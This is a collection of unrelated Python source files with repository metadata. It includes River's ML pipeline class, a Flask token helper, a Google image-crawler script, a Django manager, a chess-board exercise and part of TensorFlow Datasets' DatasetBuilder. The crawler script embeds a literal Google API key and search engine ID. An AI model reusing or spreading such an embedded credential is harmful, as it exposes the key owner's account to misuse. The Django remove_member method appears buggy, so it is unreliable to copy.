)
loss=Squared ()
l2=0.
l1=0.
intercept_init=0.
intercept_lr=Constant (
learning_rate=0.01
)
clip_gradient=1e+12
initializer=Zeros ()
)
Note that you can also declare a pipeline by using the `compose.Pipeline` constructor
method, which is slightly more verbose:
>>> from river import compose
>>> model = compose.Pipeline(scaler, log_reg)
By using a `compose.TransformerUnion`, you can define complex pipelines that apply
different steps to different parts of the data. For instance, we can extract word counts
from text data, and extract polynomial features from numeric data.
>>> from river import feature_extraction as fx
>>> tfidf = fx.TFIDF('text')
>>> counts = fx.BagOfWords('text')
>>> text_part = compose.Select('text') | (tfidf + counts)
>>> num_part = compose.Select('a', 'b') | fx.PolynomialExtender()
>>> model = text_part + num_part
>>> model |= preprocessing.StandardScaler()
>>> model |= linear_model.LinearRegression()
The following shows an example of using `debug_one` to visualize how the information
flows and changes throughout the pipeline.
>>> from river import compose
>>> from river import naive_bayes
>>> dataset = [
... ('A positive comment', True),
... ('A negative comment', False),
... ('A happy comment', True),
... ('A lovely comment', True),
... ('A harsh comment', False)
... ]
>>> tfidf = fx.TFIDF() | compose.Prefixer('tfidf_')
>>> counts = fx.BagOfWords() | compose.Prefixer('count_')
>>> mnb = naive_bayes.MultinomialNB()
>>> model = (tfidf + counts) | mnb
>>> for x, y in dataset:
... model = model.learn_one(x, y)
>>> x = dataset[0][0]
>>> report = model.debug_one(dataset[0][0])
>>> print(report)
0. Input
--------
A positive comment
1. Transformer union
--------------------
1.0 TFIDF | Prefixer
--------------------
tfidf_comment: 0.47606 (float)
tfidf_positive: 0.87942 (float)
1.1 BagOfWords | Prefixer
-------------------------
count_comment: 1 (int)
count_positive: 1 (int)
count_comment: 1 (int)
count_positive: 1 (int)
tfidf_comment: 0.50854 (float)
tfidf_positive: 0.86104 (float)
2. MultinomialNB
----------------
False: 0.19313
True: 0.80687
"""
_WARM_UP = False
_STATELESS = False
def __init__(self, *steps):
self.steps = collections.OrderedDict()
for step in steps:
self |= step
def __getitem__(self, key):
"""Just for convenience."""
return self.steps[key]
def __len__(self):
"""Just for convenience."""
return len(self.steps)
def __or__(self, other):
"""Insert a step at the end of the pipeline."""
self._add_step(other, at_start=False)
return self
def __ror__(self, other):
"""Insert a step at the start of the pipeline."""
self._add_step(other, at_start=True)
return self
def __add__(self, other):
"""Merge with another Pipeline or TransformerUnion into a TransformerUnion."""
if isinstance(other, union.TransformerUnion):
return other.__add__(self)
return union.TransformerUnion(self, other)
def __mul__(self, other):
from river import compose
if isinstance(other, (base.Transformer, Pipeline)):
return compose.TransformerProduct(self, other)
return compose.Grouper(transformer=self, by=other)
def __rmul__(self, other):
return self * other
def __str__(self):
return " | ".join(map(str, self.steps.values()))
def __repr__(self):
return (
"Pipeline (\n\t"
+ "\t".join(",\n".join(map(repr, self.steps.values())).splitlines(True))
+ "\n)"
).expandtabs(2)
def _repr_html_(self):
from river.compose import viz
div = viz.pipeline_to_html(self)
return f"<div>{ET.tostring(div, encoding='unicode')}<style scoped>{viz.CSS}</style></div>"
def _get_params(self):
return {name: step._get_params() for name, step in self.steps.items()}
def _set_params(self, new_params: dict = None):
if new_params is None:
new_params = {}
return Pipeline(
*[
(name, new_params[name])
if isinstance(new_params.get(name), base.Estimator)
else (name, step._set_params(new_params.get(name, {})))
for name, step in self.steps.items()
]
)
@property
def _supervised(self):
return any(step._supervised for step in self.steps.values())
@property
def _last_step(self):
return list(self.steps.values())[-1]
@property
def _multiclass(self):
return self._last_step._multiclass
def _add_step(self, obj: typing.Any, at_start: bool):
"""Add a step to either end of the pipeline.
This method takes care of sanitizing the input. For instance, if a function is passed,
then it will be wrapped with a `compose.FuncTransformer`.
"""
name = None
if isinstance(obj, tuple):
name, obj = obj
def _coerce_to_estimator(obj: typing.Any) -> base.Estimator:
if isinstance(obj, (types.FunctionType, types.LambdaType)):
return func.FuncTransformer(obj)
if isinstance(obj, list):
return union.TransformerUnion(
*[_coerce_to_estimator(part) for part in obj]
)
return obj
estimator = _coerce_to_estimator(obj)
def infer_name(estimator: base.Estimator) -> str:
if isinstance(estimator, func.FuncTransformer):
return infer_name(estimator.func)
if isinstance(estimator, (types.FunctionType, types.LambdaType)):
return estimator.__name__
if hasattr(estimator, "__class__"):
return estimator.__class__.__name__
return str(estimator)
# Infer a name if none is given
if name is None:
name = infer_name(estimator)
# Make sure the name doesn't already exist
if name in self.steps:
counter = 1
while f"{name}{counter}" in self.steps:
counter += 1
name = f"{name}{counter}"
# Instantiate the estimator if it hasn't been done
if isinstance(estimator, type):
estimator = estimator()
# Store the step
self.steps[name] = estimator
# Move the step to the start of the pipeline if so instructed
if at_start:
self.steps.move_to_end(name, last=False)
# Single instance methods
def learn_one(self, x: dict, y=None, **params):
"""Fit to a single instance.
Parameters
----------
x
A dictionary of features.
y
A target value.
"""
steps = iter(self.steps.values())
# Loop over the first n - 1 steps, which should all be transformers
for t in itertools.islice(steps, len(self) - 1):
if self._WARM_UP:
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_one(x)
elif not t._supervised:
t.learn_one(x)
x_pre = x
x = t.transform_one(x)
# The supervised transformers have to be updated.
# Note that this is done after transforming in order to avoid target leakage.
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if sub_t._supervised:
sub_t.learn_one(x_pre, y)
elif t._supervised:
t.learn_one(x_pre, y)
last_step = next(steps)
if last_step._supervised:
last_step.learn_one(x=x, y=y, **params)
else:
last_step.learn_one(x, **params)
return self
def _transform_one(self, x: dict):
"""This methods takes care of applying the first n - 1 steps of the pipeline, which are
supposedly transformers. It also returns the final step so that other functions can do
something with it.
"""
steps = iter(self.steps.values())
for t in itertools.islice(steps, len(self) - 1):
if not self._STATELESS:
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_one(x)
elif not t._supervised:
t.learn_one(x)
x = t.transform_one(x)
last_step = next(steps)
return x, last_step
def transform_one(self, x: dict, **params):
"""Apply each transformer in the pipeline to some features.
The final step in the pipeline will be applied if it is a transformer. If not, then it will
be ignored and the output from the penultimate step will be returned. Note that the steps
that precede the final step are assumed to all be transformers.
"""
x, last_step = self._transform_one(x)
if isinstance(last_step, base.Transformer):
if not last_step._supervised:
last_step.learn_one(x)
return last_step.transform_one(x, **params)
return x
def predict_one(self, x: dict, **params):
"""Call `transform_one` on the first steps and `predict_one` on the last step.
Parameters
----------
x
A dictionary of features.
"""
x, last_step = self._transform_one(x)
return last_step.predict_one(x, **params)
def predict_proba_one(self, x: dict, **params):
"""Call `transform_one` on the first steps and `predict_proba_one` on the last step.
Parameters
----------
x
A dictionary of features.
"""
x, last_step = self._transform_one(x)
return last_step.predict_proba_one(x, **params)
def score_one(self, x: dict, **params):
"""Call `transform_one` on the first steps and `score_one` on the last step.
Parameters
----------
x
A dictionary of features.
"""
x, last_step = self._transform_one(x)
return last_step.score_one(x, **params)
def forecast(self, horizon: int, xs: typing.List[dict] = None):
"""Return a forecast.
Only works if each estimator has a `transform_one` method and the final estimator has a
`forecast` method. This is the case of time series models from the `time_series` module.
Parameters
----------
horizon
The forecast horizon.
xs
A list of features for each step in the horizon.
"""
if xs is not None:
xs = [self._transform_one(x)[0] for x in xs]
return self._last_step.forecast(horizon=horizon, xs=xs)
def debug_one(self, x: dict, show_types=True, n_decimals=5) -> str:
"""Displays the state of a set of features as it goes through the pipeline.
Parameters
----------
x
A set of features.
show_types
Whether or not to display the type of feature along with it's value.
n_decimals
Number of decimals to display for each floating point value.
"""
tab = " " * 4
# We'll redirect all the print statement to a buffer, we'll return the content of the
# buffer at the end
buffer = io.StringIO()
_print = functools.partial(print, file=buffer)
def format_value(x):
if isinstance(x, float):
return "{:,.{prec}f}".format(x, prec=n_decimals)
return x
def print_dict(x, show_types, indent=False, space_after=True):
# Some transformers accept strings as input instead of dicts
if isinstance(x, str):
_print(x)
else:
for k, v in sorted(x.items()):
type_str = f" ({type(v).__name__})" if show_types else ""
_print(
(tab if indent else "") + f"{k}: {format_value(v)}" + type_str
)
if space_after:
_print()
def print_title(title, indent=False):
_print((tab if indent else "") + title)
_print((tab if indent else "") + "-" * len(title))
# Print the initial state of the features
print_title("0. Input")
print_dict(x, show_types=show_types)
# Print the state of x at each step
steps = iter(self.steps.values())
for i, t in enumerate(itertools.islice(steps, len(self) - 1)):
if isinstance(t, union.TransformerUnion):
print_title(f"{i+1}. Transformer union")
for j, (name, sub_t) in enumerate(t.transformers.items()):
if isinstance(sub_t, Pipeline):
name = str(sub_t)
print_title(f"{i+1}.{j} {name}", indent=True)
print_dict(
sub_t.transform_one(x), show_types=show_types, indent=True
)
x = t.transform_one(x)
print_dict(x, show_types=show_types)
else:
print_title(f"{i+1}. {t}")
x = t.transform_one(x)
print_dict(x, show_types=show_types)
# Print the predicted output from the final estimator
final = next(steps)
if not utils.inspect.istransformer(final):
print_title(f"{len(self)}. {final}")
# If the last estimator has a debug_one method then call it
if hasattr(final, "debug_one"):
_print(final.debug_one(x))
# Display the prediction
_print()
if utils.inspect.isclassifier(final):
print_dict(
final.predict_proba_one(x), show_types=False, space_after=False
)
else:
_print(f"Prediction: {format_value(final.predict_one(x))}")
return buffer.getvalue().rstrip()
# Mini-batch methods
def learn_many(self, X: pd.DataFrame, y: pd.Series = None, **params):
"""Fit to a mini-batch.
Parameters
----------
X
A dataframe of features. Columns can be added and/or removed between successive calls.
y
A series of target values.
"""
steps = iter(self.steps.values())
# Loop over the first n - 1 steps, which should all be transformers
for t in itertools.islice(steps, len(self) - 1):
if self._WARM_UP:
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_many(X)
elif not t._supervised:
t.learn_many(X)
X_pre = X
X = t.transform_many(X=X)
# The supervised transformers have to be updated.
# Note that this is done after transforming in order to avoid target leakage.
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if sub_t._supervised:
sub_t.learn_many(X=X_pre, y=y)
elif t._supervised:
t.learn_many(X=X_pre, y=y)
last_step = next(steps)
if last_step._supervised:
last_step.learn_many(X=X, y=y, **params)
else:
last_step.learn_many(X=X, **params)
return self
def _transform_many(self, X: pd.DataFrame):
"""This methods takes care of applying the first n - 1 steps of the pipeline, which are
supposedly transformers. It also returns the final step so that other functions can do
something with it.
"""
steps = iter(self.steps.values())
for t in itertools.islice(steps, len(self) - 1):
if isinstance(t, union.TransformerUnion):
for sub_t in t.transformers.values():
if not sub_t._supervised:
sub_t.learn_many(X=X)
elif not t._supervised:
t.learn_many(X=X)
X = t.transform_many(X=X)
last_step = next(steps)
return X, last_step
def transform_many(self, X: pd.DataFrame):
"""Apply each transformer in the pipeline to some features.
The final step in the pipeline will be applied if it is a transformer. If not, then it will
be ignored and the output from the penultimate step will be returned. Note that the steps
that precede the final step are assumed to all be transformers.
"""
X, last_step = self._transform_many(X=X)
if isinstance(last_step, base.Transformer):
if not last_step._supervised:
last_step.learn_many(X)
return last_step.transform_many(X)
return X
def predict_many(self, X: pd.DataFrame):
X, last_step = self._transform_many(X=X)
return last_step.predict_many(X=X)
def predict_proba_many(self, X: pd.DataFrame):
X, last_step = self._transform_many(X=X)
return last_step.predict_proba_many(X=X)
| 31.992415
| 99
| 0.59725
|
adc600dab3143008d40e69c791945859c7412622
| 746
|
py
|
Python
|
app/main/util/email_verification.py
|
mukul-mehta/Syphus
|
572d47b6b8dcdd13bd3a956b2a116a8fa3641087
|
[
"MIT"
] | 4
|
2019-08-15T02:12:52.000Z
|
2020-01-05T17:48:46.000Z
|
app/main/util/email_verification.py
|
mukul-mehta/Syphus
|
572d47b6b8dcdd13bd3a956b2a116a8fa3641087
|
[
"MIT"
] | 74
|
2019-08-14T20:34:33.000Z
|
2020-04-29T20:29:38.000Z
|
app/main/util/email_verification.py
|
NiHighlism/Minerva
|
4d95b215f0e5f1b1f768267c0a2dfea014e4baa1
|
[
"MIT"
] | 10
|
2019-08-14T19:35:14.000Z
|
2020-01-25T19:04:57.000Z
|
from flask import current_app
from itsdangerous import URLSafeTimedSerializer
def generate_confirmation_token(email):
serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
return serializer.dumps(
email, salt=current_app.config['SECURITY_PASSWORD_SALT'])
# expiration is in seconds
# TODO: Change the expiration to 24 hours when resend email is implemented
def confirm_token(token, expiration=180000000):
serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
try:
email = serializer.loads(
token,
salt=current_app.config['SECURITY_PASSWORD_SALT'],
max_age=expiration
)
except BaseException:
return False
return email
| 29.84
| 74
| 0.726542
|
c5efa56a68f97298e28f942258ebf5848f06254e
| 1,248
|
py
|
Python
|
crawl_image.py
|
ksvbka/face-mask-detector
|
c7ec54e2935a9988424b1645c46016a563b47b70
|
[
"MIT"
] | 23
|
2020-12-17T11:45:53.000Z
|
2022-03-19T06:59:11.000Z
|
crawl_image.py
|
3112ik09/face-mask-detector
|
dc33f64ddbdc6ec7d56b7f7a4fe98bbbf186354f
|
[
"MIT"
] | 1
|
2021-05-07T13:05:03.000Z
|
2021-05-17T00:59:56.000Z
|
crawl_image.py
|
3112ik09/face-mask-detector
|
dc33f64ddbdc6ec7d56b7f7a4fe98bbbf186354f
|
[
"MIT"
] | 7
|
2021-01-07T14:46:13.000Z
|
2022-01-07T09:31:22.000Z
|
import argparse
from tqdm import tqdm
from google_images_search import GoogleImagesSearch
GCS_CX = '495179597de2e4ab6'
GCS_DEVELOPER_KEY = 'AIzaSyD4dFGSan50nEmXh2Jnm4l6JHCAgEATWJc'
def crawl_image(query_text, save_dir, num=10, fileType='jpg|png', imgSize='MEDIUM'):
gis = GoogleImagesSearch(GCS_DEVELOPER_KEY, GCS_CX)
# define search params:
_search_params = {
'q': query_text,
'num': num,
'fileType': fileType,
'imgSize': imgSize
}
gis.search(search_params=_search_params)
for image in tqdm(gis.results()):
image.download(save_dir)
# image.resize(500, 500)
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-q", "--query", type=str, help="String to query image")
ap.add_argument("-d", "--out-dir", type=str, help="Path to download image")
ap.add_argument("-n", "--number", type=int, choices=range(0, 10000), help="Number of result")
ap.add_argument("-f", "--file-type", type=str, help="File type of result")
ap.add_argument("-s", "--image-size", type=str, help="Image size of result")
args = ap.parse_args()
crawl_image(args.query, args.out_dir, num=args.number, fileType=args.file_type, imgSize=args.image_size)
| 37.818182
| 108
| 0.684295
|
688a4105a307981e68c2a3db137e5bbbaf84f99f
| 444
|
py
|
Python
|
app/teams/managers.py
|
kmnkit/web-todo
|
e06e42f5b68b2b9473fad820857634a9c5c0dadf
|
[
"MIT"
] | null | null | null |
app/teams/managers.py
|
kmnkit/web-todo
|
e06e42f5b68b2b9473fad820857634a9c5c0dadf
|
[
"MIT"
] | null | null | null |
app/teams/managers.py
|
kmnkit/web-todo
|
e06e42f5b68b2b9473fad820857634a9c5c0dadf
|
[
"MIT"
] | null | null | null |
from django.db.models import Q, Manager
class CustomMemberManager(Manager):
"""Additional Manager function"""
def add_member(self, user, team):
self.create(user=user, team=team)
def remove_member(self, user, team):
self.delete(user=user, team=team)
def set_nickname(self, user, team, nickname):
member = self.get(Q(user=user) & Q(team=team))
member.nickname = nickname
member.save()
| 26.117647
| 54
| 0.655405
|
1210422231e52709cdecd6dacce22f5f2ff97494
| 1,410
|
py
|
Python
|
[1] BEGINNER/2787 - Xadrez.py
|
tiago040/URI-SOLUTIONS
|
519d3950252a6002e8926416b2f8217ba08fe721
|
[
"MIT"
] | 1
|
2022-03-15T03:03:26.000Z
|
2022-03-15T03:03:26.000Z
|
[1] BEGINNER/2787 - Xadrez.py
|
tiago040/URI-SOLUTIONS
|
519d3950252a6002e8926416b2f8217ba08fe721
|
[
"MIT"
] | null | null | null |
[1] BEGINNER/2787 - Xadrez.py
|
tiago040/URI-SOLUTIONS
|
519d3950252a6002e8926416b2f8217ba08fe721
|
[
"MIT"
] | null | null | null |
'''
No tabuleiro de xadrez, a casa na linha 1, coluna 1 (canto superior esquerdo) é sempre branca e as cores das casas se alternam entre branca e preta, de acordo com o padrão conhecido como... xadrez! Dessa forma, como o tabuleiro tradicional tem oito linhas e oito colunas, a casa na linha 8, coluna 8 (canto inferior direito) será também branca. Neste problema, entretanto, queremos saber a cor da casa no canto inferior direito de um tabuleiro com dimensões quaisquer: L linhas e C colunas. No exemplo da figura, para L = 6 e C = 9, a casa no canto inferior direito será preta!
https://resources.urionlinejudge.com.br/gallery/images/problems/UOJ_2787.png
Entrada
A primeira linha da entrada contém um inteiro L (1 ≤ L ≤ 1000) indicando o número de linhas do tabuleiro. A segunda linha da entrada contém um inteiro C (1 ≤ C ≤ 1000) representando o número de colunas.
Saída
Imprima uma linha na saída. A linha deve conter um inteiro, representando a cor da casa no canto inferior direito do tabuleiro: 1, se for branca; e 0, se for preta.
'''
L = int(input())
C = int(input())
cor = int()
if L % 2 == 0:
if C % 2 != 0:
cor = 0
else:
cor = 1
if L % 2 != 0:
if C % 2 != 0:
cor = 1
else:
cor = 0
if C % 2 == 0:
if L % 2 != 0:
cor = 0
else:
cor = 1
if C % 2 != 0:
if L % 2 != 0:
cor = 1
else:
cor = 0
print(cor)
| 39.166667
| 577
| 0.656738
|
9b2877d408e8b38a6b5a4165ed29599657e30a52
| 49,069
|
py
|
Python
|
tensorflow_datasets/core/dataset_builder.py
|
Jaidon-Smith/datasets
|
a2cc0bdb91243a123dafd03478be51e2b0436a98
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/core/dataset_builder.py
|
Jaidon-Smith/datasets
|
a2cc0bdb91243a123dafd03478be51e2b0436a98
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/core/dataset_builder.py
|
Jaidon-Smith/datasets
|
a2cc0bdb91243a123dafd03478be51e2b0436a98
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DatasetBuilder base class."""
import abc
import functools
import inspect
import json
import os
import sys
from typing import Any, ClassVar, Dict, Iterable, List, Optional, Union
from absl import logging
import dataclasses
import six
import tensorflow.compat.v2 as tf
from tensorflow_datasets.core import constants
from tensorflow_datasets.core import dataset_info
from tensorflow_datasets.core import download
from tensorflow_datasets.core import file_adapters
from tensorflow_datasets.core import registered
from tensorflow_datasets.core import split_builder as split_builder_lib
from tensorflow_datasets.core import splits as splits_lib
from tensorflow_datasets.core import tf_compat
from tensorflow_datasets.core import tfrecords_reader
from tensorflow_datasets.core import units
from tensorflow_datasets.core import utils
from tensorflow_datasets.core.utils import gcs_utils
from tensorflow_datasets.core.utils import read_config as read_config_lib
from tensorflow_datasets.core.utils import type_utils
import termcolor
ReadOnlyPath = type_utils.ReadOnlyPath
ReadWritePath = type_utils.ReadWritePath
VersionOrStr = Union[utils.Version, str]
FORCE_REDOWNLOAD = download.GenerateMode.FORCE_REDOWNLOAD
REUSE_CACHE_IF_EXISTS = download.GenerateMode.REUSE_CACHE_IF_EXISTS
REUSE_DATASET_IF_EXISTS = download.GenerateMode.REUSE_DATASET_IF_EXISTS
GCS_HOSTED_MSG = """\
Dataset %s is hosted on GCS. It will automatically be downloaded to your
local data directory. If you'd instead prefer to read directly from our public
GCS bucket (recommended if you're running on GCP), you can instead pass
`try_gcs=True` to `tfds.load` or set `data_dir=gs://tfds-data/datasets`.
"""
@dataclasses.dataclass(eq=False)
class BuilderConfig:
"""Base class for `DatasetBuilder` data configuration.
DatasetBuilder subclasses with data configuration options should subclass
`BuilderConfig` and add their own properties.
"""
# TODO(py3.10): Should update dataclass to be:
# * Frozen (https://bugs.python.org/issue32953)
# * Kwargs-only (https://bugs.python.org/issue33129)
name: str
version: Optional[VersionOrStr] = None
release_notes: Optional[Dict[str, str]] = None
supported_versions: List[str] = dataclasses.field(default_factory=list)
description: Optional[str] = None
class DatasetBuilder(registered.RegisteredDataset):
"""Abstract base class for all datasets.
`DatasetBuilder` has 3 key methods:
* `tfds.DatasetBuilder.info`: documents the dataset, including feature
names, types, and shapes, version, splits, citation, etc.
* `tfds.DatasetBuilder.download_and_prepare`: downloads the source data
and writes it to disk.
* `tfds.DatasetBuilder.as_dataset`: builds an input pipeline using
`tf.data.Dataset`s.
**Configuration**: Some `DatasetBuilder`s expose multiple variants of the
dataset by defining a `tfds.core.BuilderConfig` subclass and accepting a
config object (or name) on construction. Configurable datasets expose a
pre-defined set of configurations in `tfds.DatasetBuilder.builder_configs`.
Typical `DatasetBuilder` usage:
```python
mnist_builder = tfds.builder("mnist")
mnist_info = mnist_builder.info
mnist_builder.download_and_prepare()
datasets = mnist_builder.as_dataset()
train_dataset, test_dataset = datasets["train"], datasets["test"]
assert isinstance(train_dataset, tf.data.Dataset)
# And then the rest of your input pipeline
train_dataset = train_dataset.repeat().shuffle(1024).batch(128)
train_dataset = train_dataset.prefetch(2)
features = tf.compat.v1.data.make_one_shot_iterator(train_dataset).get_next()
image, label = features['image'], features['label']
```
"""
# Semantic version of the dataset (ex: tfds.core.Version('1.2.0'))
VERSION = None
# Release notes
# Metadata only used for documentation. Should be a dict[version,description]
# Multi-lines are automatically dedent
RELEASE_NOTES: ClassVar[Dict[str, str]] = {}
# List dataset versions which can be loaded using current code.
# Data can only be prepared with canonical VERSION or above.
SUPPORTED_VERSIONS = []
# Named configurations that modify the data generated by download_and_prepare.
BUILDER_CONFIGS = []
# Must be set for datasets that use 'manual_dir' functionality - the ones
# that require users to do additional steps to download the data
# (this is usually due to some external regulations / rules).
#
# This field should contain a string with user instructions, including
# the list of files that should be present. It will be
# displayed in the dataset documentation.
MANUAL_DOWNLOAD_INSTRUCTIONS = None
def __init__(
self,
*,
data_dir: Optional[utils.PathLike] = None,
config: Union[None, str, BuilderConfig] = None,
version: Union[None, str, utils.Version] = None,
):
"""Constructs a DatasetBuilder.
Callers must pass arguments as keyword arguments.
Args:
data_dir: directory to read/write data. Defaults to the value of
the environment variable TFDS_DATA_DIR, if set, otherwise falls back to
"~/tensorflow_datasets".
config: `tfds.core.BuilderConfig` or `str` name, optional configuration
for the dataset that affects the data generated on disk. Different
`builder_config`s will have their own subdirectories and versions.
version: Optional version at which to load the dataset. An error is
raised if specified version cannot be satisfied. Eg: '1.2.3', '1.2.*'.
The special value "experimental_latest" will use the highest version,
even if not default. This is not recommended unless you know what you
are doing, as the version could be broken.
"""
if data_dir:
data_dir = os.fspath(data_dir) # Pathlib -> str
# For pickling:
self._original_state = dict(data_dir=data_dir, config=config,
version=version)
# To do the work:
self._builder_config = self._create_builder_config(config)
# Extract code version (VERSION or config)
self._version = self._pick_version(version)
# Compute the base directory (for download) and dataset/version directory.
self._data_dir_root, self._data_dir = self._build_data_dir(data_dir)
if tf.io.gfile.exists(self._data_dir):
self.info.read_from_directory(self._data_dir)
else: # Use the code version (do not restore data)
self.info.initialize_from_bucket()
@utils.classproperty
@classmethod
@utils.memoize()
def code_path(cls) -> ReadOnlyPath:
"""Returns the path to the file where the Dataset class is located.
Note: As the code can be run inside zip file. The returned value is
a `ReadOnlyPath` by default. Use `tfds.core.utils.to_write_path()` to cast
the path into `ReadWritePath`.
Returns:
path: pathlib.Path like abstraction
"""
modules = cls.__module__.split(".")
if len(modules) >= 2: # Filter `__main__`, `python my_dataset.py`,...
# If the dataset can be loaded from a module, use this to support zipapp.
# Note: `utils.resource_path` will return either `zipfile.Path` (for
# zipapp) or `pathlib.Path`.
try:
path = utils.resource_path(modules[0])
except TypeError: # Module is not a package
pass
else:
# For dynamically added modules, `importlib.resources` returns
# `pathlib.Path('.')` rather than the real path, so filter those by
# checking for `parts`.
# Check for `zipfile.Path` (`ResourcePath`) as it does not have `.parts`
if isinstance(path, utils.ResourcePath) or path.parts:
modules[-1] += ".py"
return path.joinpath(*modules[1:])
# Otherwise, fallback to `pathlib.Path`. For non-zipapp, it should be
# equivalent to the above return.
return utils.as_path(inspect.getfile(cls))
def __getstate__(self):
return self._original_state
def __setstate__(self, state):
self.__init__(**state)
@utils.memoized_property
def canonical_version(self) -> utils.Version:
if self._builder_config and self._builder_config.version:
return utils.Version(self._builder_config.version)
elif self.VERSION:
return utils.Version(self.VERSION)
else:
raise ValueError(
f"DatasetBuilder {self.name} does not have a defined version. "
"Please add a `VERSION = tfds.core.Version('x.y.z')` to the class."
)
@utils.memoized_property
def supported_versions(self):
if self._builder_config and self._builder_config.supported_versions:
return self._builder_config.supported_versions
else:
return self.SUPPORTED_VERSIONS
@utils.memoized_property
def versions(self) -> List[utils.Version]:
"""Versions (canonical + availables), in preference order."""
return [
utils.Version(v) if isinstance(v, six.string_types) else v
for v in [self.canonical_version] + self.supported_versions
]
def _pick_version(self, requested_version):
"""Returns utils.Version instance, or raise AssertionError."""
# Validate that `canonical_version` is correctly defined
assert self.canonical_version
if requested_version == "experimental_latest":
return max(self.versions)
for version in self.versions:
if requested_version is None or version.match(requested_version):
return version
available_versions = [str(v) for v in self.versions]
msg = "Dataset {} cannot be loaded at version {}, only: {}.".format(
self.name, requested_version, ", ".join(available_versions))
raise AssertionError(msg)
@property
def version(self):
return self._version
@property
def release_notes(self) -> Dict[str, str]:
if self.builder_config and self.builder_config.release_notes:
return self.builder_config.release_notes
else:
return self.RELEASE_NOTES
@property
def data_dir(self):
return self._data_dir
@property
def data_path(self) -> type_utils.ReadWritePath:
# Instead, should make `_data_dir` be Path everywhere
return utils.as_path(self._data_dir)
@utils.classproperty
@classmethod
def _checksums_path(cls) -> ReadOnlyPath:
"""Returns the checksums path."""
# Used:
# * To load the checksums (in url_infos)
# * To save the checksums (in DownloadManager)
new_path = cls.code_path.parent / "checksums.tsv"
# Checksums of legacy datasets are located in a separate dir.
legacy_path = utils.tfds_path() / "url_checksums" / f"{cls.name}.txt"
if (
# zipfile.Path does not have `.parts`. Additionally, `os.fspath`
# will extract the file, so use `str`.
"tensorflow_datasets" in str(new_path)
and legacy_path.exists()
and not new_path.exists()
):
return legacy_path
else:
return new_path
@utils.classproperty
@classmethod
@functools.lru_cache(maxsize=None)
def url_infos(cls) -> Optional[Dict[str, download.checksums.UrlInfo]]:
"""Load `UrlInfo` from the given path."""
# Note: If the dataset is downloaded with `record_checksums=True`, urls
# might be updated but `url_infos` won't as it is memoized.
# Search for the url_info file.
checksums_path = cls._checksums_path
# If url_info file is found, load the urls
if checksums_path.exists():
return download.checksums.load_url_infos(checksums_path)
else:
return None
@utils.memoized_property
def info(self) -> dataset_info.DatasetInfo:
"""`tfds.core.DatasetInfo` for this builder."""
# Ensure .info hasn't been called before versioning is set-up
# Otherwise, backward compatibility cannot be guaranteed as some code will
# depend on the code version instead of the restored data version
if not getattr(self, "_version", None):
# Message for developers creating new dataset. Will trigger if they are
# using .info in the constructor before calling super().__init__
raise AssertionError(
"Info should not been called before version has been defined. "
"Otherwise, the created .info may not match the info version from "
"the restored dataset.")
info = self._info()
if not isinstance(info, dataset_info.DatasetInfo):
raise TypeError(
"DatasetBuilder._info should returns `tfds.core.DatasetInfo`, not "
f" {type(info)}."
)
return info
def download_and_prepare(self, *, download_dir=None, download_config=None):
"""Downloads and prepares dataset for reading.
Args:
download_dir: `str`, directory where downloaded files are stored.
Defaults to "~/tensorflow-datasets/downloads".
download_config: `tfds.download.DownloadConfig`, further configuration for
downloading and preparing dataset.
Raises:
IOError: if there is not enough disk space available.
"""
download_config = download_config or download.DownloadConfig()
data_exists = tf.io.gfile.exists(self._data_dir)
if data_exists and download_config.download_mode == REUSE_DATASET_IF_EXISTS:
logging.info("Reusing dataset %s (%s)", self.name, self._data_dir)
return
if self.version.tfds_version_to_prepare:
available_to_prepare = ", ".join(str(v) for v in self.versions
if not v.tfds_version_to_prepare)
raise AssertionError(
"The version of the dataset you are trying to use ({}:{}) can only "
"be generated using TFDS code synced @ {} or earlier. Either sync to "
"that version of TFDS to first prepare the data or use another "
"version of the dataset (available for `download_and_prepare`: "
"{}).".format(
self.name, self.version, self.version.tfds_version_to_prepare,
available_to_prepare))
# Only `cls.VERSION` or `experimental_latest` versions can be generated.
# Otherwise, users may accidentally generate an old version using the
# code from newer versions.
installable_versions = {
str(v) for v in (self.canonical_version, max(self.versions))
}
if str(self.version) not in installable_versions:
msg = (
"The version of the dataset you are trying to use ({}) is too "
"old for this version of TFDS so cannot be generated."
).format(self.info.full_name)
if self.version.tfds_version_to_prepare:
msg += (
"{} can only be generated using TFDS code synced @ {} or earlier "
"Either sync to that version of TFDS to first prepare the data or "
"use another version of the dataset. "
).format(self.version, self.version.tfds_version_to_prepare)
else:
msg += (
"Either sync to a previous version of TFDS to first prepare the "
"data or use another version of the dataset. "
)
msg += "Available for `download_and_prepare`: {}".format(
list(sorted(installable_versions)))
raise ValueError(msg)
# Currently it's not possible to overwrite the data because it would
# conflict with versioning: If the last version has already been generated,
# it will always be reloaded and data_dir will be set at construction.
if data_exists:
raise ValueError(
"Trying to overwrite an existing dataset {} at {}. A dataset with "
"the same version {} already exists. If the dataset has changed, "
"please update the version number.".format(self.name, self._data_dir,
self.version))
logging.info("Generating dataset %s (%s)", self.name, self._data_dir)
if not utils.has_sufficient_disk_space(
self.info.dataset_size + self.info.download_size,
directory=self._data_dir_root):
print(
"Not enough disk space. Needed: {} (download: {}, generated: {})"
.format(
self.info.dataset_size + self.info.download_size,
self.info.download_size,
self.info.dataset_size,
))
self._log_download_bytes()
dl_manager = self._make_download_manager(
download_dir=download_dir,
download_config=download_config,
)
